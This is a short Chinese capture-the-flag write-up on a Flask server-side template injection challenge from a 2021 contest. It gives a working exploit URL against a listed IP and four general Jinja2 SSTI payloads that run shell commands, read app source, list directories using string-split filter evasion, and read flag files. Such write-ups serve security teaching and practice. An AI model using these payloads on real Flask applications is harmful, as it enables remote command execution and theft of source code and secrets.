2021-10-09 网络安全(交通银行杯)-WEB安全(测试题)-Flask入门
一:题目
访问地址:
点击here:
发现是ssti,属于模板引擎漏洞
输入连接地址:http://1.117.248.182:5000/ssti?name={{%27%27.class.base.subclasses()[80].init.globals[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27type%20flag.txt%27).read()%22)}}
得到flag:qxwcevrsdfwfgfxcdfg
其他知识点补充:
以flask框架为例
服务端模板注入攻击:SSTI
1.直接用OS模块执行系统命令查看根目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
2.读app.py这个文件的源码
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}
3.os.listdir() 方法用于返回指定的文件夹包含的文件或文件夹的名字的列表
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
4.读取flag文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}
- 点赞
- 收藏
- 关注作者
评论(0)